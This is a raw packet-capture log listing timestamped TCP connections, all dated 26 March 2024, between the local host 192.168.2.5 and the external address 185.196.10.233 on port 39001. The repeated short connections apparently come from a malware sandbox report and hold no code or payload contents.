Mar 26, 2024 18:23:37.944665909 CET	49751	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:23:38.021195889 CET	39001	49750	185.196.10.233	192.168.2.5
Mar 26, 2024 18:23:38.021492004 CET	39001	49750	185.196.10.233	192.168.2.5
Mar 26, 2024 18:23:38.021686077 CET	49750	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:23:38.131453037 CET	39001	49751	185.196.10.233	192.168.2.5
Mar 26, 2024 18:23:38.131541014 CET	49751	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:23:38.162641048 CET	49751	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:23:38.394126892 CET	39001	49751	185.196.10.233	192.168.2.5
Mar 26, 2024 18:23:38.394176960 CET	49751	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:23:38.604789972 CET	39001	49751	185.196.10.233	192.168.2.5
Mar 26, 2024 18:23:38.818566084 CET	49751	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:23:39.005527973 CET	39001	49751	185.196.10.233	192.168.2.5
Mar 26, 2024 18:23:39.006699085 CET	49751	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:23:39.120240927 CET	49753	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:23:39.193099022 CET	39001	49751	185.196.10.233	192.168.2.5
Mar 26, 2024 18:23:39.193149090 CET	39001	49751	185.196.10.233	192.168.2.5
Mar 26, 2024 18:23:39.193248034 CET	49751	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:23:39.306967020 CET	39001	49753	185.196.10.233	192.168.2.5
Mar 26, 2024 18:23:39.311403036 CET	49753	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:23:39.567951918 CET	49753	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:23:39.800355911 CET	39001	49753	185.196.10.233	192.168.2.5
Mar 26, 2024 18:23:39.803360939 CET	49753	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:23:40.010973930 CET	39001	49753	185.196.10.233	192.168.2.5
Mar 26, 2024 18:23:40.131073952 CET	49753	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:23:40.317445993 CET	39001	49753	185.196.10.233	192.168.2.5
Mar 26, 2024 18:23:40.427952051 CET	49753	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:23:41.458086967 CET	49753	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:23:41.570780039 CET	49755	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:23:41.644599915 CET	39001	49753	185.196.10.233	192.168.2.5
Mar 26, 2024 18:23:41.644757032 CET	39001	49753	185.196.10.233	192.168.2.5
Mar 26, 2024 18:23:41.644799948 CET	49753	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:23:41.758135080 CET	39001	49755	185.196.10.233	192.168.2.5
Mar 26, 2024 18:23:41.758208036 CET	49755	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:23:41.786050081 CET	49755	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:23:42.019268036 CET	39001	49755	185.196.10.233	192.168.2.5
Mar 26, 2024 18:23:42.019370079 CET	49755	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:23:42.225338936 CET	39001	49755	185.196.10.233	192.168.2.5
Mar 26, 2024 18:23:42.318551064 CET	49755	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:23:42.505040884 CET	39001	49755	185.196.10.233	192.168.2.5
Mar 26, 2024 18:23:42.505866051 CET	49755	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:23:42.616236925 CET	49756	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:23:42.692374945 CET	39001	49755	185.196.10.233	192.168.2.5
Mar 26, 2024 18:23:42.692713976 CET	39001	49755	185.196.10.233	192.168.2.5
Mar 26, 2024 18:23:42.692931890 CET	49755	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:23:42.802982092 CET	39001	49756	185.196.10.233	192.168.2.5
Mar 26, 2024 18:23:42.803061962 CET	49756	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:23:42.826551914 CET	49756	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:23:43.066071987 CET	39001	49756	185.196.10.233	192.168.2.5
Mar 26, 2024 18:23:43.066137075 CET	49756	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:23:43.274086952 CET	39001	49756	185.196.10.233	192.168.2.5
Mar 26, 2024 18:23:43.388739109 CET	49756	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:23:43.575232983 CET	39001	49756	185.196.10.233	192.168.2.5
Mar 26, 2024 18:23:43.588021994 CET	49756	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:23:43.694700956 CET	49757	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:23:43.775562048 CET	39001	49756	185.196.10.233	192.168.2.5
Mar 26, 2024 18:23:43.775630951 CET	39001	49756	185.196.10.233	192.168.2.5
Mar 26, 2024 18:23:43.775681019 CET	49756	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:23:43.881664038 CET	39001	49757	185.196.10.233	192.168.2.5
Mar 26, 2024 18:23:43.881736040 CET	49757	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:23:43.902407885 CET	49757	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:23:44.144484997 CET	39001	49757	185.196.10.233	192.168.2.5
Mar 26, 2024 18:23:44.144548893 CET	49757	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:23:44.352607965 CET	39001	49757	185.196.10.233	192.168.2.5
Mar 26, 2024 18:23:44.506197929 CET	49757	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:23:44.692883015 CET	39001	49757	185.196.10.233	192.168.2.5
Mar 26, 2024 18:23:44.693610907 CET	49757	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:23:44.803946018 CET	49758	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:23:44.880274057 CET	39001	49757	185.196.10.233	192.168.2.5
Mar 26, 2024 18:23:44.880479097 CET	39001	49757	185.196.10.233	192.168.2.5
Mar 26, 2024 18:23:44.880605936 CET	49757	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:23:44.990647078 CET	39001	49758	185.196.10.233	192.168.2.5
Mar 26, 2024 18:23:44.990731955 CET	49758	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:23:45.003729105 CET	49758	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:23:45.237962008 CET	39001	49758	185.196.10.233	192.168.2.5
Mar 26, 2024 18:23:45.238035917 CET	49758	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:23:45.475945950 CET	39001	49758	185.196.10.233	192.168.2.5
Mar 26, 2024 18:23:45.480086088 CET	39001	49758	185.196.10.233	192.168.2.5
Mar 26, 2024 18:23:45.582308054 CET	49758	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:23:45.769268036 CET	39001	49758	185.196.10.233	192.168.2.5
Mar 26, 2024 18:23:45.770077944 CET	49758	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:23:45.882961035 CET	49759	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:23:45.956777096 CET	39001	49758	185.196.10.233	192.168.2.5
Mar 26, 2024 18:23:45.956916094 CET	39001	49758	185.196.10.233	192.168.2.5
Mar 26, 2024 18:23:45.956971884 CET	49758	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:23:46.069686890 CET	39001	49759	185.196.10.233	192.168.2.5
Mar 26, 2024 18:23:46.069771051 CET	49759	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:23:46.084062099 CET	49759	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:23:46.316179037 CET	39001	49759	185.196.10.233	192.168.2.5
Mar 26, 2024 18:23:46.316262960 CET	49759	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:23:46.523225069 CET	39001	49759	185.196.10.233	192.168.2.5
Mar 26, 2024 18:23:46.568571091 CET	49759	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:23:46.755171061 CET	39001	49759	185.196.10.233	192.168.2.5
Mar 26, 2024 18:23:46.755951881 CET	49759	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:23:46.884957075 CET	49760	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:23:46.942462921 CET	39001	49759	185.196.10.233	192.168.2.5
Mar 26, 2024 18:23:46.942789078 CET	39001	49759	185.196.10.233	192.168.2.5
Mar 26, 2024 18:23:46.942840099 CET	49759	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:23:47.071893930 CET	39001	49760	185.196.10.233	192.168.2.5
Mar 26, 2024 18:23:47.071976900 CET	49760	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:23:47.090174913 CET	49760	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:23:47.331760883 CET	39001	49760	185.196.10.233	192.168.2.5
Mar 26, 2024 18:23:47.331828117 CET	49760	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:23:47.551074982 CET	39001	49760	185.196.10.233	192.168.2.5
Mar 26, 2024 18:23:47.599837065 CET	49760	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:23:47.786444902 CET	39001	49760	185.196.10.233	192.168.2.5
Mar 26, 2024 18:23:47.787106991 CET	49760	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:23:47.897439957 CET	49761	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:23:47.973972082 CET	39001	49760	185.196.10.233	192.168.2.5
Mar 26, 2024 18:23:47.973993063 CET	39001	49760	185.196.10.233	192.168.2.5
Mar 26, 2024 18:23:47.974056005 CET	49760	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:23:48.084177971 CET	39001	49761	185.196.10.233	192.168.2.5
Mar 26, 2024 18:23:48.084265947 CET	49761	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:23:48.101820946 CET	49761	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:23:48.331716061 CET	39001	49761	185.196.10.233	192.168.2.5
Mar 26, 2024 18:23:48.331783056 CET	49761	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:23:48.552931070 CET	39001	49761	185.196.10.233	192.168.2.5
Mar 26, 2024 18:23:48.631099939 CET	49761	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:23:48.817825079 CET	39001	49761	185.196.10.233	192.168.2.5
Mar 26, 2024 18:23:48.818643093 CET	49761	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:23:48.928805113 CET	49762	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:23:49.005336046 CET	39001	49761	185.196.10.233	192.168.2.5
Mar 26, 2024 18:23:49.005631924 CET	39001	49761	185.196.10.233	192.168.2.5
Mar 26, 2024 18:23:49.005682945 CET	49761	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:23:49.115248919 CET	39001	49762	185.196.10.233	192.168.2.5
Mar 26, 2024 18:23:49.115312099 CET	49762	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:23:49.129524946 CET	49762	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:23:49.362997055 CET	39001	49762	185.196.10.233	192.168.2.5
Mar 26, 2024 18:23:49.363107920 CET	49762	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:23:49.577976942 CET	39001	49762	185.196.10.233	192.168.2.5
Mar 26, 2024 18:23:49.631055117 CET	49762	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:23:49.817634106 CET	39001	49762	185.196.10.233	192.168.2.5
Mar 26, 2024 18:23:49.818418980 CET	49762	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:23:49.928771019 CET	49763	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:23:50.004865885 CET	39001	49762	185.196.10.233	192.168.2.5
Mar 26, 2024 18:23:50.004966021 CET	39001	49762	185.196.10.233	192.168.2.5
Mar 26, 2024 18:23:50.005012035 CET	49762	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:23:50.115607977 CET	39001	49763	185.196.10.233	192.168.2.5
Mar 26, 2024 18:23:50.115690947 CET	49763	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:23:50.129528999 CET	49763	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:23:50.363035917 CET	39001	49763	185.196.10.233	192.168.2.5
Mar 26, 2024 18:23:50.363159895 CET	49763	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:23:50.568902016 CET	39001	49763	185.196.10.233	192.168.2.5
Mar 26, 2024 18:23:50.724848032 CET	49763	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:23:50.911462069 CET	39001	49763	185.196.10.233	192.168.2.5
Mar 26, 2024 18:23:50.912147999 CET	49763	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:23:51.049343109 CET	49764	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:23:51.098936081 CET	39001	49763	185.196.10.233	192.168.2.5
Mar 26, 2024 18:23:51.098958015 CET	39001	49763	185.196.10.233	192.168.2.5
Mar 26, 2024 18:23:51.099019051 CET	49763	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:23:51.236390114 CET	39001	49764	185.196.10.233	192.168.2.5
Mar 26, 2024 18:23:51.236464977 CET	49764	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:23:51.251163960 CET	49764	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:23:51.488122940 CET	39001	49764	185.196.10.233	192.168.2.5
Mar 26, 2024 18:23:51.488260031 CET	49764	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:23:51.697931051 CET	39001	49764	185.196.10.233	192.168.2.5
Mar 26, 2024 18:23:51.927947998 CET	49764	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:23:52.114614010 CET	39001	49764	185.196.10.233	192.168.2.5
Mar 26, 2024 18:23:52.116138935 CET	49764	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:23:52.226092100 CET	49765	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:23:52.302551985 CET	39001	49764	185.196.10.233	192.168.2.5
Mar 26, 2024 18:23:52.302798033 CET	39001	49764	185.196.10.233	192.168.2.5
Mar 26, 2024 18:23:52.302844048 CET	49764	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:23:52.412914991 CET	39001	49765	185.196.10.233	192.168.2.5
Mar 26, 2024 18:23:52.413005114 CET	49765	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:23:52.434412956 CET	49765	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:23:52.675524950 CET	39001	49765	185.196.10.233	192.168.2.5
Mar 26, 2024 18:23:52.675586939 CET	49765	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:23:52.883765936 CET	39001	49765	185.196.10.233	192.168.2.5
Mar 26, 2024 18:23:52.927949905 CET	49765	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:23:53.114604950 CET	39001	49765	185.196.10.233	192.168.2.5
Mar 26, 2024 18:23:53.115489006 CET	49765	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:23:53.226428986 CET	49766	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:23:53.302161932 CET	39001	49765	185.196.10.233	192.168.2.5
Mar 26, 2024 18:23:53.302329063 CET	39001	49765	185.196.10.233	192.168.2.5
Mar 26, 2024 18:23:53.302387953 CET	49765	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:23:53.413038015 CET	39001	49766	185.196.10.233	192.168.2.5
Mar 26, 2024 18:23:53.413119078 CET	49766	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:23:53.498167992 CET	49766	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:23:53.738106012 CET	39001	49766	185.196.10.233	192.168.2.5
Mar 26, 2024 18:23:53.738198042 CET	49766	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:23:53.944566965 CET	39001	49766	185.196.10.233	192.168.2.5
Mar 26, 2024 18:23:54.098052025 CET	49766	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:23:54.285131931 CET	39001	49766	185.196.10.233	192.168.2.5
Mar 26, 2024 18:23:54.288108110 CET	49766	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:23:54.397819042 CET	49767	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:23:54.474610090 CET	39001	49766	185.196.10.233	192.168.2.5
Mar 26, 2024 18:23:54.474723101 CET	39001	49766	185.196.10.233	192.168.2.5
Mar 26, 2024 18:23:54.474785089 CET	49766	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:23:54.584652901 CET	39001	49767	185.196.10.233	192.168.2.5
Mar 26, 2024 18:23:54.584753990 CET	49767	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:23:54.597867966 CET	49767	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:23:54.831731081 CET	39001	49767	185.196.10.233	192.168.2.5
Mar 26, 2024 18:23:54.831913948 CET	49767	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:23:55.054204941 CET	39001	49767	185.196.10.233	192.168.2.5
Mar 26, 2024 18:23:55.099838972 CET	49767	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:23:55.286887884 CET	39001	49767	185.196.10.233	192.168.2.5
Mar 26, 2024 18:23:55.302397013 CET	49767	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:23:55.435137987 CET	49768	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:23:55.489597082 CET	39001	49767	185.196.10.233	192.168.2.5
Mar 26, 2024 18:23:55.489656925 CET	49767	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:23:55.621917009 CET	39001	49768	185.196.10.233	192.168.2.5
Mar 26, 2024 18:23:55.622035027 CET	49768	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:23:55.694050074 CET	49768	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:23:55.925379992 CET	39001	49768	185.196.10.233	192.168.2.5
Mar 26, 2024 18:23:55.925448895 CET	49768	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:23:56.138670921 CET	39001	49768	185.196.10.233	192.168.2.5
Mar 26, 2024 18:23:56.318598986 CET	49768	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:23:56.505271912 CET	39001	49768	185.196.10.233	192.168.2.5
Mar 26, 2024 18:23:56.524775982 CET	49768	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:23:56.632509947 CET	49769	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:23:56.711437941 CET	39001	49768	185.196.10.233	192.168.2.5
Mar 26, 2024 18:23:56.711859941 CET	39001	49768	185.196.10.233	192.168.2.5
Mar 26, 2024 18:23:56.711981058 CET	49768	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:23:56.820080996 CET	39001	49769	185.196.10.233	192.168.2.5
Mar 26, 2024 18:23:56.820158005 CET	49769	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:23:57.205069065 CET	49769	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:23:57.440958977 CET	39001	49769	185.196.10.233	192.168.2.5
Mar 26, 2024 18:23:57.441015005 CET	49769	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:23:57.650264978 CET	39001	49769	185.196.10.233	192.168.2.5
Mar 26, 2024 18:23:57.740495920 CET	49769	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:23:57.926911116 CET	39001	49769	185.196.10.233	192.168.2.5
Mar 26, 2024 18:23:58.037384987 CET	49769	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:23:59.148468971 CET	49769	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:23:59.261606932 CET	49771	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:23:59.335026026 CET	39001	49769	185.196.10.233	192.168.2.5
Mar 26, 2024 18:23:59.335269928 CET	39001	49769	185.196.10.233	192.168.2.5
Mar 26, 2024 18:23:59.335328102 CET	49769	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:23:59.448517084 CET	39001	49771	185.196.10.233	192.168.2.5
Mar 26, 2024 18:23:59.448611021 CET	49771	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:23:59.464973927 CET	49771	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:23:59.691128016 CET	39001	49771	185.196.10.233	192.168.2.5
Mar 26, 2024 18:23:59.691195011 CET	49771	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:23:59.903610945 CET	39001	49771	185.196.10.233	192.168.2.5
Mar 26, 2024 18:24:00.037362099 CET	49771	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:24:00.223856926 CET	39001	49771	185.196.10.233	192.168.2.5
Mar 26, 2024 18:24:00.224736929 CET	49771	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:24:00.337817907 CET	49772	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:24:00.411331892 CET	39001	49771	185.196.10.233	192.168.2.5
Mar 26, 2024 18:24:00.411541939 CET	39001	49771	185.196.10.233	192.168.2.5
Mar 26, 2024 18:24:00.411931038 CET	49771	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:24:00.524681091 CET	39001	49772	185.196.10.233	192.168.2.5
Mar 26, 2024 18:24:00.524813890 CET	49772	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:24:00.542696953 CET	49772	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:24:00.769300938 CET	39001	49772	185.196.10.233	192.168.2.5
Mar 26, 2024 18:24:00.769624949 CET	49772	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:24:00.989360094 CET	39001	49772	185.196.10.233	192.168.2.5
Mar 26, 2024 18:24:01.037400007 CET	49772	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:24:01.224117994 CET	39001	49772	185.196.10.233	192.168.2.5
Mar 26, 2024 18:24:01.244364023 CET	49772	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:24:01.350737095 CET	49773	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:24:01.431220055 CET	39001	49772	185.196.10.233	192.168.2.5
Mar 26, 2024 18:24:01.431241035 CET	39001	49772	185.196.10.233	192.168.2.5
Mar 26, 2024 18:24:01.431374073 CET	49772	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:24:01.537594080 CET	39001	49773	185.196.10.233	192.168.2.5
Mar 26, 2024 18:24:01.537683964 CET	49773	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:24:01.550636053 CET	49773	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:24:01.784912109 CET	39001	49773	185.196.10.233	192.168.2.5
Mar 26, 2024 18:24:01.785058975 CET	49773	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:24:02.013410091 CET	39001	49773	185.196.10.233	192.168.2.5
Mar 26, 2024 18:24:02.115525007 CET	49773	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:24:02.305502892 CET	39001	49773	185.196.10.233	192.168.2.5
Mar 26, 2024 18:24:02.306164980 CET	49773	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:24:02.413386106 CET	49775	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:24:02.492696047 CET	39001	49773	185.196.10.233	192.168.2.5
Mar 26, 2024 18:24:02.492975950 CET	39001	49773	185.196.10.233	192.168.2.5
Mar 26, 2024 18:24:02.493038893 CET	49773	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:24:02.599975109 CET	39001	49775	185.196.10.233	192.168.2.5
Mar 26, 2024 18:24:02.600060940 CET	49775	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:24:02.623940945 CET	49775	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:24:02.862960100 CET	39001	49775	185.196.10.233	192.168.2.5
Mar 26, 2024 18:24:02.863074064 CET	49775	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:24:03.073443890 CET	39001	49775	185.196.10.233	192.168.2.5
Mar 26, 2024 18:24:03.224884033 CET	49775	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:24:03.411206961 CET	39001	49775	185.196.10.233	192.168.2.5
Mar 26, 2024 18:24:03.414875984 CET	49775	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:24:03.522622108 CET	49776	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:24:03.601313114 CET	39001	49775	185.196.10.233	192.168.2.5
Mar 26, 2024 18:24:03.601444006 CET	39001	49775	185.196.10.233	192.168.2.5
Mar 26, 2024 18:24:03.601694107 CET	49775	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:24:03.709362030 CET	39001	49776	185.196.10.233	192.168.2.5
Mar 26, 2024 18:24:03.710221052 CET	49776	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:24:03.746342897 CET	49776	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:24:03.987945080 CET	39001	49776	185.196.10.233	192.168.2.5
Mar 26, 2024 18:24:03.988003969 CET	49776	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:24:04.197091103 CET	39001	49776	185.196.10.233	192.168.2.5
Mar 26, 2024 18:24:04.240464926 CET	49776	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:24:04.428823948 CET	39001	49776	185.196.10.233	192.168.2.5
Mar 26, 2024 18:24:04.430042982 CET	49776	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:24:04.541577101 CET	49778	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:24:04.616704941 CET	39001	49776	185.196.10.233	192.168.2.5
Mar 26, 2024 18:24:04.616789103 CET	39001	49776	185.196.10.233	192.168.2.5
Mar 26, 2024 18:24:04.616842985 CET	49776	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:24:04.728358984 CET	39001	49778	185.196.10.233	192.168.2.5
Mar 26, 2024 18:24:04.728439093 CET	49778	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:24:04.745578051 CET	49778	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:24:04.987905979 CET	39001	49778	185.196.10.233	192.168.2.5
Mar 26, 2024 18:24:04.987992048 CET	49778	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:24:05.195089102 CET	39001	49778	185.196.10.233	192.168.2.5
Mar 26, 2024 18:24:05.240464926 CET	49778	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:24:05.429038048 CET	39001	49778	185.196.10.233	192.168.2.5
Mar 26, 2024 18:24:05.432167053 CET	49778	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:24:05.538203001 CET	49779	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:24:05.618586063 CET	39001	49778	185.196.10.233	192.168.2.5
Mar 26, 2024 18:24:05.618834972 CET	39001	49778	185.196.10.233	192.168.2.5
Mar 26, 2024 18:24:05.618910074 CET	49778	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:24:05.724821091 CET	39001	49779	185.196.10.233	192.168.2.5
Mar 26, 2024 18:24:05.724982023 CET	49779	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:24:05.737622023 CET	49779	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:24:05.972419024 CET	39001	49779	185.196.10.233	192.168.2.5
Mar 26, 2024 18:24:05.972495079 CET	49779	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:24:06.178142071 CET	39001	49779	185.196.10.233	192.168.2.5
Mar 26, 2024 18:24:06.318618059 CET	49779	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:24:06.505187988 CET	39001	49779	185.196.10.233	192.168.2.5
Mar 26, 2024 18:24:06.509313107 CET	49779	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:24:06.631901979 CET	49780	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:24:06.695913076 CET	39001	49779	185.196.10.233	192.168.2.5
Mar 26, 2024 18:24:06.696154118 CET	39001	49779	185.196.10.233	192.168.2.5
Mar 26, 2024 18:24:06.696214914 CET	49779	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:24:06.818603039 CET	39001	49780	185.196.10.233	192.168.2.5
Mar 26, 2024 18:24:06.818718910 CET	49780	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:24:06.840993881 CET	49780	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:24:07.082298040 CET	39001	49780	185.196.10.233	192.168.2.5
Mar 26, 2024 18:24:07.082379103 CET	49780	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:24:07.289318085 CET	39001	49780	185.196.10.233	192.168.2.5
Mar 26, 2024 18:24:07.427994967 CET	49780	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:24:07.614654064 CET	39001	49780	185.196.10.233	192.168.2.5
Mar 26, 2024 18:24:07.615358114 CET	49780	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:24:07.725719929 CET	49781	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:24:07.802012920 CET	39001	49780	185.196.10.233	192.168.2.5
Mar 26, 2024 18:24:07.802185059 CET	39001	49780	185.196.10.233	192.168.2.5
Mar 26, 2024 18:24:07.802233934 CET	49780	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:24:07.912179947 CET	39001	49781	185.196.10.233	192.168.2.5
Mar 26, 2024 18:24:07.912568092 CET	49781	39001	192.168.2.5	185.196.10.233
